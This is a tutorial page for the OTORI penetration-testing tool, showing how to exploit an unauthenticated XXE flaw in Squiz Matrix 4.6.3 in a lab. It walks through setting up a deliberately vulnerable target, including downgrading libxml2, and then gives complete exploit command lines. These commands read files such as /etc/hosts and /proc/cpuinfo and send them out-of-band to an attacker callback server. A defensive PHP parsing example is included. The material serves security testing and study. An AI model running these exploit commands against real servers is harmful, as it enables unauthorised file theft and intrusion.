OTORI - Example 2: Squiz Matrix
This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.
The instructions in this tutorial are slightly less-detailed than for other articles on this website. This is because the software described should not be used if you are unfamiliar with basic- to intermediate-level use of Linux. Proceeding without having that knowledge is very likely to result in damage and/or loss of data.
Squiz Matrix is one of many open-source content-management systems available today. According to its creators, its focus is on people who work in marketing.
From an XXE perspective, Squiz Matrix is interesting because the vulnerable version can be exploited without authentication, and, as a PHP-based application, it can be used to retrieve binary content (although the file size is limited to about 2KiB unless it was built in an unusual way).
Taking advantage of Squiz Matrix requires the use of the type of techniques described by Timur Yunusov and Alexey Osipov at Black Hat EU 2013[1].
Important: Squiz Matrix becomes invulnerable to the modules described below if the system-level libxml2 library is too new. The change appears to have been made in early June of 2014 in the Ubuntu release of libxml2, which is noted as being intended to address CVE-2014-0191. The instructions below include a step to downgrade the library in question. If you find an instance which is not vulnerable in a real pen-test, the underlying OS has probably had its libraries patched.
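Whichever libxml2 package happens to be installed, the application-side fix for this class of bug is to parse client-supplied XML with external loading switched off and to refuse DOCTYPEs entirely, so that parameter entities never reach the parser. The following PHP is an added example written for this page, not code from OTORI or from Squiz Matrix; the function names and the constructed sample documents are this example's own.

```php
<?php
// Added example for this page (not OTORI or Squiz Matrix code): parsing
// untrusted XML in a PHP 5.x application so that external parameter
// entities are never fetched, whatever the installed libxml2 build does.

// Report the libxml2 version PHP is linked against, for comparison with
// the package versions discussed in this tutorial.
function libxml_runtime_version() {
    return LIBXML_DOTTED_VERSION;
}

// Parse $xml defensively; returns a DOMDocument, or null if rejected.
// Three independent layers, so the outcome does not depend on the
// libxml2 patch level:
//   1. libxml_disable_entity_loader(true): PHP refuses every external
//      entity/DTD fetch for the duration of the parse (PHP >= 5.2.11).
//   2. LIBXML_NONET: libxml2 itself refuses network access.
//   3. Any DOCTYPE is rejected outright; a CMS never needs a DTD supplied
//      by the client, and the DTD is where parameter entities live.
function parse_untrusted_xml($xml) {
    $prev_loader = libxml_disable_entity_loader(true);
    $prev_errors = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->substituteEntities = false;   // never enables LIBXML_NOENT
    $doc->resolveExternals   = false;
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev_errors);
    libxml_disable_entity_loader($prev_loader);
    if (!$ok || $doc->doctype !== null) {
        return null;
    }
    return $doc;
}

// Constructed sample documents: one plain, one carrying an external DTD
// reference of the kind an out-of-band XXE payload relies on.
$benign   = '<?xml version="1.0"?><asset><name>Home</name></asset>';
$with_dtd = '<?xml version="1.0"?>'
    . '<!DOCTYPE asset SYSTEM "http://swamm.vuln.local:8080/CBt/">'
    . '<asset><name>Home</name></asset>';

printf("libxml2 %s\n", libxml_runtime_version());
printf("plain document parsed: %s\n",
       parse_untrusted_xml($benign) !== null ? 'yes' : 'no');
printf("DOCTYPE document rejected: %s\n",
       parse_untrusted_xml($with_dtd) === null ? 'yes' : 'no');
```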
Test Environment Systems
You'll need 2-3 systems for this exercise:
I strongly recommend that you build VMs specifically for this testing, or at least snapshot existing VMs before you begin, so that if something goes wrong, you won't lose any data/work. This software is a pre-alpha preview of a tool designed for penetration testing (in other words, it actively misuses its target(s)). Take appropriate safety precautions.
Test Environment Setup
Setting up the attacking system is easy — just unpack the current release of On The Outside, Reaching In. If you are running She Wore A Mirrored Mask on a separate system, you'll want to unpack that too.
The target system will take more effort — Squiz Matrix is a bit of a chore to set up. The following instructions should get you up and running if you're using Ubuntu 12.04 x64 as the base OS. With any other OS you will pretty much be on your own, due to the large number of dependencies required. I really recommend that you build an Ubuntu 12.04 VM specifically to install Squiz Matrix on — there are a number of aspects to the configuration that will make it difficult to host anything else on it.
Screenshots of key steps are below the list of instructions.
sudo apt-get install autoconf automake bison build-essential cvs flex gcc g++ libtool m4 make wget postgresql apache2-mpm-prefork php5 libapache2-mod-php5 php5-gd php5-pgsql php-pear
sudo pear install Auth_SASL DB Archive_Tar Mail Mail_Mime Mail_mimeDecode Mail_Queue XML_HTMLSax XML_Parser XML_RPC XML_Tree Text_Diff HTTP HTTP_Request HTTP_Client Net_URL Image_Graph-0.7.2 Image_Color Image_Canvas-0.3.1 Math_Stats-0.8.5 Net_SMTP Net_Socket Numbers_Roman Numbers_Words-0.16.4 I18N_UnicodeNormalizer Services_JSON MDB2 pear/MDB2#pgsql
sudo apt-get install libxml2=2.7.8.dfsg-5.1ubuntu4
(I know that versions as recent as 2.7.8.dfsg-5.1ubuntu4.6 are vulnerable, but they're not in the standard repository).
wget "http://public-cvs.squiz.net/cgi-bin/viewcvs.cgi/*checkout*/mysource_matrix/scripts/dev/checkout.sh"
chmod +x checkout.sh
./checkout.sh mysource_4-6-3 "squiz_matrix_4.6.3"
(Note: you will get a few errors indicating "no such tag mysource_4-6-3" — this is because those components did not exist when 4.6.3 was released.)
tar -cjvf "squiz_matrix_4.6.3.tar.bz2" squiz_matrix_4.6.3
sudo su
su postgres
createuser -SRDU postgres matrix
createuser -SRDU postgres matrix_secondary
Note that these commands will create these users with empty passwords. This is very bad, but it is word-for-word from the official Squiz Matrix installation guide. We'll be fixing that shortly.
createdb -U postgres -O matrix -E UTF8 squiz_matrix
createlang -U postgres plpgsql squiz_matrix
psql
ALTER DATABASE squiz_matrix SET bytea_output TO 'escape';
ALTER USER matrix WITH PASSWORD '2737ae7431508912302bf3513c0189bf';
ALTER USER matrix_secondary WITH PASSWORD '6152d75ceb00a4f82368fc8fdaa41618';
\q
exit
exit
php install/step_01.php /home/squiz/squiz_matrix_4.6.3
php install/step_02.php /home/squiz/squiz_matrix_4.6.3
php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3
php install/step_03.php /home/squiz/squiz_matrix_4.6.3
php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3
chmod --recursive o+w cache
chmod --recursive o+w data
<VirtualHost *:80>
ServerName squiztarget.vuln.local
ServerAdmin webmaster@localhost
DocumentRoot /home/squiz/squiz_matrix_4.6.3/core/web
Options -Indexes FollowSymLinks
<Directory /home/squiz/squiz_matrix_4.6.3>
Order deny,allow
Deny from all
</Directory>
<DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/(core/(web|lib)|data/public|fudge)">
Order allow,deny
Allow from all
</DirectoryMatch>
<DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/data/public/assets">
SetHandler default-handler
</DirectoryMatch>
<FilesMatch "\.inc$">
Order allow,deny
Deny from all
</FilesMatch>
<LocationMatch "/(CVS|\.FFV)/">
Order allow,deny
Deny from all
</LocationMatch>
Alias /__fudge /home/squiz/squiz_matrix_4.6.3/fudge
Alias /__data /home/squiz/squiz_matrix_4.6.3/data/public
Alias /__lib /home/squiz/squiz_matrix_4.6.3/core/lib
Alias / /home/squiz/squiz_matrix_4.6.3/core/web/index.php/
</VirtualHost>
sudo /etc/init.d/apache2 restart
Yay! You're done! Unless you got some errors, in which case you'll need to do some web searches.
Preparing to Exploit Squiz Matrix
In contrast to the ordeal of setting up the simulated target system, exploiting Squiz Matrix 4.6.3 is ridiculously easy when using On The Outside, Reaching In. All you need to know in order to proceed to the next section is the web administration URL for the target Squiz Matrix instance. For example, if you followed the steps in the previous section exactly, that would be http://squiztarget.vuln.local/_admin/.
That's right - you don't even need a web browser — let alone an intercepting proxy — if you know the URL in question.
SOS-12-007-YU-OOB - Fully Out-Of-Band Data Exfiltration Module
SOS-12-007-YU-OOB is the most effective of the three Squiz Matrix-related modules, so if you only read one section of this tutorial, it should be this one.
For purposes of this tutorial, assume that swamm.vuln.local is the machine name for the attacking system running She Wore A Mirrored Mask. If you are using a different name, or an IP address, substitute that as necessary. The name or IP you use must be defined and accessible to the target system as well as the attacking system. That is, if you have defined swamm.vuln.local in the /etc/hosts file on your attacking system, you must also define it in the /etc/hosts file on the simulated target system.
python ./swamm.py
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///proc/cpuinfo" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///boot/grub/boot.img" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --exacturilist "lists/linux-system_information.txt" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
In many cases, you will need to obtain further information about the system and use that to construct targeted lists. For example, perhaps there is a web interface to another component on the system which tells you that its base installation directory is /opt/some_server_18.2.3/. You could download the installer for that software to a test VM, unpack it, and figure out what its interesting contents might be (e.g. conf/database_connection_string.xml), and then map that relative path onto the known base path for the real target server.
SOS-12-007-YU-OOB - Screenshots
Illustrations related to the preceding section.
SOS-12-007-YU-404 - Reference To Nonexistent Page/Error-Reflection (Base64-Encoded) Module
This module works in virtually the same way as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:
python ./otori.py --clone --module "SOS-12-007-YU-404" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
SOS-12-007-YU-IU - Reference To Invalid URI/Error-Reflection (Non-Base64-Encoded) Module
This module is included for purposes of showing the different ways that the actual vulnerability in Squiz Matrix can be exploited (for those who are interested in writing their own modules). It is not recommended for general use (partly because unlike the previous two, it cannot retrieve binary content), but uses the same syntax as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:
python ./otori.py --clone --module "SOS-12-007-YU-IU" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
1. See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding Black Hat EU 2013 presentation, also by Timur Yunusov and Alexey Osipov.
2. The following versions of PEAR-installed components were used when writing this tutorial:
Archive_Tar [was installed by default]
Auth_SASL
DB: 1.0.6
HTTP: 1.4.1
HTTP_Client: 1.2.1
HTTP_Request: 1.4.4
I18N_UnicodeNormalizer: 1.0.0
Image_Canvas: 0.3.1
Image_Color: 1.0.4
Image_Graph: 0.7.2
Mail: 1.2.0
Mail_Mime: 1.8.9
Mail_mimeDecode: 1.5.5
Mail_Queue: 1.2.7
Math_Stats: 0.8.5
MDB2: 2.4.1
MDB2_Driver_pgsql: 1.4.1
Net_SMTP: 1.6.2
Net_Socket: 1.0.14
Net_URL: 1.0.15
Numbers_Roman: 1.0.2
Numbers_Words: 0.16.4
Services_JSON: 1.0.3
Text_Diff: 1.1.1
XML_HTMLSax: 2.1.2
XML_Parser: 1.3.4
XML_RPC: 1.5.5
XML_Tree: 1.1